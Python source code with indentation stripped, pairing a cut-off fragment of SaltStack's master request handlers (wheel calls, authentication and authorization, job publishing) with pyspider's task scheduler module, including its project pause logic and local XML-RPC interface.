auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)
# Authenticate
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
error = auth_check.get('error')
if error:
# Authentication error occurred: do not continue.
return {'error': error}
# Authorize
username = auth_check.get('username')
if auth_type != 'user':
wheel_check = self.ckminions.wheel_check(
auth_check.get('auth_list', []),
clear_load['fun'],
clear_load.get('kwarg', {})
)
if not wheel_check:
return {'error': {'name': err_name,
'message': 'Authentication failure of type "{0}" occurred for '
'user {1}.'.format(auth_type, username)}}
elif isinstance(wheel_check, dict) and 'error' in wheel_check:
# A dictionary with an error name/message was handled by ckminions.wheel_check
return wheel_check
# No error occurred, consume sensitive settings from the clear_load if passed.
for item in sensitive_load_keys:
clear_load.pop(item, None)
else:
if 'user' in clear_load:
username = clear_load['user']
if salt.auth.AuthUser(username).is_sudo():
username = self.opts.get('user', 'root')
else:
username = salt.utils.user.get_user()
# Authorized. Do the job!
try:
jid = salt.utils.jid.gen_jid(self.opts)
fun = clear_load.pop('fun')
tag = tagify(jid, prefix='wheel')
data = {'fun': "wheel.{0}".format(fun),
'jid': jid,
'tag': tag,
'user': username}
self.event.fire_event(data, tagify([jid, 'new'], 'wheel'))
ret = self.wheel_.call_func(fun, full_return=True, **clear_load)
data['return'] = ret['return']
data['success'] = ret['success']
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
except Exception as exc:
log.error('Exception occurred while introspecting %s: %s', fun, exc)
data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format(
fun,
exc.__class__.__name__,
exc,
)
data['success'] = False
self.event.fire_event(data, tagify([jid, 'ret'], 'wheel'))
return {'tag': tag,
'data': data}
def mk_token(self, clear_load):
'''
Create and return an authentication token, the clear load needs to
contain the eauth key and the needed authentication creds.
'''
token = self.loadauth.mk_token(clear_load)
if not token:
log.warning('Authentication failure of type "eauth" occurred.')
return ''
return token
def get_token(self, clear_load):
'''
Return the name associated with a token or False if the token is invalid
'''
if 'token' not in clear_load:
return False
return self.loadauth.get_tok(clear_load['token'])
def publish(self, clear_load):
'''
This method sends out publications to the minions, it can only be used
by the LocalClient.
'''
extra = clear_load.get('kwargs', {})
publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist'])
if publisher_acl.user_is_blacklisted(clear_load['user']) or \
publisher_acl.cmd_is_blacklisted(clear_load['fun']):
log.error(
'%s does not have permissions to run %s. Please contact '
'your local administrator if you believe this is in '
'error.\n', clear_load['user'], clear_load['fun']
)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Retrieve the minions list
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
_res = self.ckminions.check_minions(
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
delimiter
)
minions = _res.get('minions', list())
missing = _res.get('missing', list())
ssh_minions = _res.get('ssh_minions', False)
# Check for external auth calls and authenticate
auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra)
if auth_type == 'user':
auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)
else:
auth_check = self.loadauth.check_authentication(extra, auth_type)
# Setup authorization list variable and error information
auth_list = auth_check.get('auth_list', [])
err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type)
if auth_check.get('error'):
# Authentication error occurred: do not continue.
log.warning(err_msg)
return {'error': {'name': 'AuthenticationError',
'message': 'Authentication error occurred.'}}
# All Token, Eauth, and non-root users must pass the authorization check
if auth_type != 'user' or (auth_type == 'user' and auth_list):
# Authorize the request
authorized = self.ckminions.auth_check(
auth_list,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
minions=minions,
# always accept find_job
whitelist=['saltutil.find_job'],
)
if not authorized:
# Authorization error occurred. Do not continue.
if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra:
log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username'])
log.warning(err_msg)
return {'error': {'name': 'AuthorizationError',
'message': 'Authorization error occurred.'}}
# Perform some specific auth_type tasks after the authorization check
if auth_type == 'token':
username = auth_check.get('username')
clear_load['user'] = username
log.debug('Minion tokenized user = "%s"', username)
elif auth_type == 'eauth':
# The username we are attempting to auth with
clear_load['user'] = self.loadauth.load_name(extra)
# If we order masters (via a syndic), don't short circuit if no minions
# are found
if not self.opts.get('order_masters'):
# Check for no minions
if not minions:
return {
'enc': 'clear',
'load': {
'jid': None,
'minions': minions,
'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt'])
}
}
jid = self._prep_jid(clear_load, extra)
if jid is None:
return {'enc': 'clear',
'load': {'error': 'Master failed to assign jid'}}
payload = self._prep_pub(minions, jid, clear_load, extra, missing)
# Send it!
self._send_ssh_pub(payload, ssh_minions=ssh_minions)
self._send_pub(payload)
return {
'enc': 'clear',
'load': {
'jid': clear_load['jid'],
'minions': minions,
'missing': missing
}
}
def _prep_auth_info(self, clear_load):
sensitive_load_keys = []
key = None
if 'token' in clear_load:
auth_type = 'token'
err_name = 'TokenAuthenticationError'
sensitive_load_keys = ['token']
elif 'eauth' in clear_load:
auth_type = 'eauth'
err_name = 'EauthAuthenticationError'
sensitive_load_keys = ['username', 'password']
else:
auth_type = 'user'
err_name = 'UserAuthenticationError'
key = self.key
return auth_type, err_name, key, sensitive_load_keys
def _prep_jid(self, clear_load, extra):
'''
Return a jid for this publication
'''
# the jid in clear_load can be None, '', or something else. this is an
# attempt to clean up the value before passing to plugins
passed_jid = clear_load['jid'] if clear_load.get('jid') else None
nocache = extra.get('nocache', False)
# Retrieve the jid
fstr = '{0}.prep_jid'.format(self.opts['master_job_cache'])
try:
# Retrieve the jid
jid = self.mminion.returners[fstr](nocache=nocache,
passed_jid=passed_jid)
except (KeyError, TypeError):
# The returner is not present
msg = (
'Failed to allocate a jid. The requested returner \'{0}\' '
'could not be loaded.'.format(fstr.split('.')[0])
)
log.error(msg)
return {'error': msg}
return jid
def _send_pub(self, load):
'''
Take a load and send it across the network to connected minions
'''
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.publish(load)
@property
def ssh_client(self):
if not hasattr(self, '_ssh_client'):
self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts)
return self._ssh_client
def _send_ssh_pub(self, load, ssh_minions=False):
'''
Take a load and send it across the network to ssh minions
'''
if self.opts['enable_ssh_minions'] is True and ssh_minions is True:
log.debug('Send payload to ssh minions')
threading.Thread(target=self.ssh_client.cmd, kwargs=load).start()
def _prep_pub(self, minions, jid, clear_load, extra, missing):
'''
Take a given load and perform the necessary steps
to prepare a publication.
TODO: This is really only bound by temporal cohesion
and thus should be refactored even further.
'''
clear_load['jid'] = jid
delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM)
# TODO Error reporting over the master event bus
self.event.fire_event({'minions': minions}, clear_load['jid'])
new_job_load = {
'jid': clear_load['jid'],
'tgt_type': clear_load['tgt_type'],
'tgt': clear_load['tgt'],
'user': clear_load['user'],
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'minions': minions,
'missing': missing,
}
# Announce the job on the event bus
self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job'))
if self.opts['ext_job_cache']:
fstr = '{0}.save_load'.format(self.opts['ext_job_cache'])
save_load_func = True
# Get the returner's save_load arg_spec.
try:
arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr])
# Check if 'minions' is included in returner's save_load arg_spec.
# This may be missing in custom returners, which we should warn about.
if 'minions' not in arg_spec.args:
log.critical(
'The specified returner used for the external job cache '
'\'%s\' does not have a \'minions\' kwarg in the returner\'s '
'save_load function.', self.opts['ext_job_cache']
)
except (AttributeError, KeyError):
save_load_func = False
log.critical(
'The specified returner used for the external job cache '
'"%s" does not have a save_load function!',
self.opts['ext_job_cache']
)
if save_load_func:
try:
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# always write out to the master job caches
try:
fstr = '{0}.save_load'.format(self.opts['master_job_cache'])
self.mminion.returners[fstr](clear_load['jid'], clear_load, minions)
except KeyError:
log.critical(
'The specified returner used for the master job cache '
'"%s" does not have a save_load function!',
self.opts['master_job_cache']
)
except Exception:
log.critical(
'The specified returner threw a stack trace:\n',
exc_info=True
)
# Set up the payload
payload = {'enc': 'aes'}
# Altering the contents of the publish load is serious!! Changes here
# break compatibility with minion/master versions and even tiny
# additions can have serious implications on the performance of the
# publish commands.
#
# In short, check with Thomas Hatch before you even think about
# touching this stuff, we can probably do what you want to do another
# way that won't have a negative impact.
load = {
'fun': clear_load['fun'],
'arg': clear_load['arg'],
'tgt': clear_load['tgt'],
'jid': clear_load['jid'],
'ret': clear_load['ret'],
}
# if you specified a master id, lets put that in the load
if 'master_id' in self.opts:
load['master_id'] = self.opts['master_id']
# if someone passed us one, use that
if 'master_id' in extra:
load['master_id'] = extra['master_id']
# Only add the delimiter to the pub data if it is non-default
if delimiter != DEFAULT_TARGET_DELIM:
load['delimiter'] = delimiter
if 'id' in extra:
load['id'] = extra['id']
if 'tgt_type' in clear_load:
load['tgt_type'] = clear_load['tgt_type']
if 'to' in clear_load:
load['to'] = clear_load['to']
if 'kwargs' in clear_load:
if 'ret_config' in clear_load['kwargs']:
load['ret_config'] = clear_load['kwargs'].get('ret_config')
if 'metadata' in clear_load['kwargs']:
load['metadata'] = clear_load['kwargs'].get('metadata')
if 'module_executors' in clear_load['kwargs']:
load['module_executors'] = clear_load['kwargs'].get('module_executors')
if 'executor_opts' in clear_load['kwargs']:
load['executor_opts'] = clear_load['kwargs'].get('executor_opts')
if 'ret_kwargs' in clear_load['kwargs']:
load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs')
if 'user' in clear_load:
log.info(
'User %s Published command %s with jid %s',
clear_load['user'], clear_load['fun'], clear_load['jid']
)
load['user'] = clear_load['user']
else:
log.info(
'Published command %s with jid %s',
clear_load['fun'], clear_load['jid']
)
log.debug('Published command details %s', load)
return load
def ping(self, clear_load):
'''
Send the load back to the sender.
'''
return clear_load
class FloMWorker(MWorker):
'''
Change the run and bind to be ioflo friendly
'''
def __init__(self,
opts,
key,
):
MWorker.__init__(self, opts, key)
def setup(self):
'''
Prepare the needed objects and socket for iteration within ioflo
'''
salt.utils.crypt.appendproctitle(self.__class__.__name__)
self.clear_funcs = salt.master.ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('ZMQ Worker binding to socket %s', self.w_uri)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
self.socket.connect(self.w_uri)
def handle_request(self):
'''
Handle a single request
'''
try:
polled = self.poller.poll(1)
if polled:
package = self.socket.recv()
self._update_aes()
payload = self.serial.loads(package)
ret = self.serial.dumps(self._handle_payload(payload))
self.socket.send(ret)
except KeyboardInterrupt:
raise
except Exception as exc:
# Properly handle EINTR from SIGUSR1
if isinstance(exc, zmq.ZMQError) and exc.errno == errno.EINTR:
return
|
scheduler.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.helper.logging import task_log, task_monitor
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
'''
'''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
if 'process' not in task['track']:
logger.error('process not in task, %r', task)
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
if self.md5sum != md5sum:
self.waiting_get_info = True
self.md5sum = md5sum
if self.waiting_get_info and self.active:
self._send_on_get_info = True
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 30
PAUSE_TIME = 5
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
STATUS_PACK = 2 # current not used
REQUEST_PACK = 3 # current not used
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
# update project runtime info from processor by sending a _on_get_info
# request, result is in status_page.track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
# load task queue when project is running and delete task_queue when project is stoped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
'''
return False if any of 'taskid', 'project', 'url' is not in task dict
or project in not in task_queue
'''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
'''
dispatch task to fetcher
out queue may have size limit to prevent block, a send_buffer is used
'''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if int(project.min_tick) == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
# use force=False here to prevent automatic send_buffer append and get exception
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
# dynamic assign select limit for each project, use qsize as weight
project_weights, total_weight = dict(), 0
for project in itervalues(self.projects): # type:Project
if not project.active:
continue
# only check project pause when select new tasks, cronjob and new request still working
if project.paused:
continue
if project.waiting_get_info:
continue
# task queue
task_queue = project.task_queue # type:TaskQueue
pro_weight = task_queue.size()
total_weight += pro_weight
project_weights[project.name] = pro_weight
pass
min_project_limit = int(limit / 10.) # ensure minimum select limit for each project
max_project_limit = int(limit / 3.0) # ensure maximum select limit for each project
for pro_name, pro_weight in iteritems(project_weights):
if cnt >= limit:
break
project = self.projects[pro_name] # type:Project
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
# calculate select limit for project
if total_weight < 1 or pro_weight < 1:
project_limit = min_project_limit
else:
project_limit = int((1.0 * pro_weight / total_weight) * limit)
if project_limit < min_project_limit:
project_limit = min_project_limit
elif project_limit > max_project_limit:
project_limit = max_project_limit
# check send_buffer here. when not empty, out_queue may blocked. Not sending tasks
while cnt < limit and project_cnt < project_limit:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self._postpone_request.append({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
'''comsume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def get_task_queue_len():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = len(project.task_queue)
return result
application.register_function(get_task_queue_len, 'get_task_queue_len')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'task_queue_len': get_task_queue_len(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
